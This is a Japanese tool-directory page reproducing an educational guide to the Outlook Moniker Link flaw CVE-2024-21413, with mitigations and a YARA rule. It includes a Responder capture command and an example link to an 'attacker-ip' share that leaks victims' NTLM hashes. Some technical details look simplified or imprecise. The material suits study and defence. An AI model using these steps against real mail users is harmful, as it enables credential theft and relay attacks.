Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Moniker-Link--CVE-2024-21413- — CVE-2024-21413に関する教育ガイド。これは、モニカーリンクを介してNTLM資格情報の盗用を可能にするゼロクリックOutlookの脆弱性です。悪用、YARAを用いた検出、および緩和戦略について説明します。 | Kitploit
ツール/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
パスワードクラッキングフィッシングツール脆弱性分析エクスプロイトIDS/IPS回避横移動ペネトレーションテスト学習と教育レッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
メールセキュリティ
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

CVE-2024-21413に関する教育ガイド。これは、モニカーリンクを介してNTLM資格情報の盗用を可能にするゼロクリックOutlookの脆弱性です。悪用、YARAを用いた検出、および緩和戦略について説明します。

リポジトリを見る
3ヶ月前未レビュー

🔗 Moniker Link (CVE-2024-21413) — Outlook ゼロクリック脆弱性実践ガイド


📌 1. はじめに

CVE-2024-21413は、一般に Moniker Link脆弱性として知られ、Microsoft Outlookの重大なセキュリティ上の欠陥であり、攻撃者がユーザーの操作を必要とせずに認証情報を漏洩することを可能にします。

従来のフィッシング攻撃とは異なり、この脆弱性はメールをプレビューするだけでトリガーされる可能性があり、企業環境において特に危険です。

問題は、Outlookがmonikerリンクを処理する方法に起因し、攻撃者が制御するシステムへの意図しない認証試行を引き起こします。


🧠 2. 主要な概念

以下の概念を理解することが重要です:

🔹 Moniker リンク

アプリケーションが以下のようなプロトコルを使用して外部リソースを参照できるようにするWindows固有のメカニズム:

  • file://
  • unc://

🔹 NTLM認証

  • レガシーなWindows認証プロトコル
  • リモートリソースにアクセスする際に自動的にハッシュ化された認証情報を送信する
  • 認証情報のキャプチャとリレー攻撃に対して脆弱

🔹 UNCパス (Universal Naming Convention)

root@kitploit:~
\\attacker-server\share

ネットワーク上の共有リソースにアクセスするために使用されます。この脆弱性では、認証要求を強制するために悪用されます。

🔹 Protected View の回避

Outlookの Protected Viewは、潜在的に安全でないコンテンツを隔離するように設計されています。この脆弱性はその保護を回避し、外部リソースへのアクセスを許可します。


⚙️ 3. 動作の仕組み

攻撃フロー(ステップバイステップ)

  1. ペイロードの作成
    • 攻撃者は悪意のあるmonikerリンク(例:file://attacker-server/share)をメール内に埋め込みます。
  2. 配信
    • 被害者にメールが送信されます。
  3. トリガー
    • 被害者がOutlookでメールをプレビューまたは開封します。
  4. 自動処理
    • Outlookがユーザーの操作なしにリンクを処理します。
  5. 認証要求
    • Windowsが攻撃者のサーバーに対してNTLM認証を試みます。
  6. 認証情報の露出
    • 攻撃者がNTLMハッシュをキャプチャします。

攻撃フロー図

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. 現実世界への影響

一般的な攻撃シナリオ

  • 組織を標的にしたフィッシングキャンペーン
  • 企業ネットワークでの認証情報の収集
  • 横移動のための初期アクセス

攻撃者の目的

  • NTLMハッシュのキャプチャ
  • 内部サービスへの認証リレー
  • ネットワーク内での権限昇格

🛠️ 5. ツールとテクノロジー

攻撃・研究ツール

  • Responder — NTLM認証ハッシュをキャプチャ
  • Impacket — ネットワーク悪用ツールキット
  • ntlmrelayx.py — NTLMリレー攻撃を実行

防御ツール

  • Microsoft Defender — エンドポイントの検出と対応
  • Wireshark — ネットワークトラフィックの検査
  • Sysmon — 高度なシステムイベントログ

💻 6. 実践例(ラボ環境限定)

⚠️ 管理されたラボ環境でのみ実施してください

NTLMキャプチャサービスの起動

root@kitploit:~
sudo responder -I eth0

悪意のあるリンクの例

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

期待される出力

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. 検出(YARAルール)

Florian Rothによって、monikerリンクを含む悪用試行を識別するための検出ルールが開発されました。

YARAルールの例

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

検出のユースケース

  • メールゲートウェイのスキャン
  • SIEMアラートの生成
  • 不審なリンクに対する脅威ハンティング

🛡️ 8. 緩和策とベストプラクティス

パッチ管理

  • Microsoftが提供するセキュリティ更新プログラムを直ちに適用する

認証の強化

  • 可能な限りNTLMを無効にする
  • Kerberos認証を強制する

ネットワーク制御

  • 外部ネットワークへの送信SMB(TCP 445)をブロックする
  • 不要な送信接続を制限する

メールセキュリティ

  • file:// およびUNCベースのリンクをフィルタリングまたはサニタイズする
  • 高度なメール脅威保護ソリューションを使用する

監視と検出

  • 送信認証試行を監視する
  • 異常なSMBトラフィックをログに記録しアラートを発する

⚠️ 9. よくある間違い

  • ユーザーの操作が必要だと思い込む
  • 現代の環境におけるNTLM関連のリスクを無視する
  • ネットワーク制御なしにウイルス対策のみに依存する
  • パッチの展開を遅らせる

🧾 10. 結論

CVE-2024-21413は、自動認証のような深く統合されたシステムの動作が、メールリンクなどの一見無害な入力によってどのように悪用されるかを示しています。

重要なポイント

  • ゼロクリック脆弱性 — ユーザーの操作は不要
  • Outlookのmonikerリンク処理を悪用
  • NTLM認証情報の漏洩を引き起こす
  • YARAおよびネットワーク監視を使用して検出可能
  • パッチ適用と適切な設定により防止可能

📚 11. 参考文献

  • Microsoft セキュリティアドバイザリ — CVE-2024-21413
  • Impacket ドキュメント (NTLMリレー攻撃)
  • YARA ドキュメント
  • OWASP 認証チートシート

💡 推奨事項: 仮想ラボ(例:Windows VM + 攻撃者VM)でこの脆弱性を再現し、攻撃チェーンと防御戦略を完全に理解することを推奨します。

ツールをダウンロード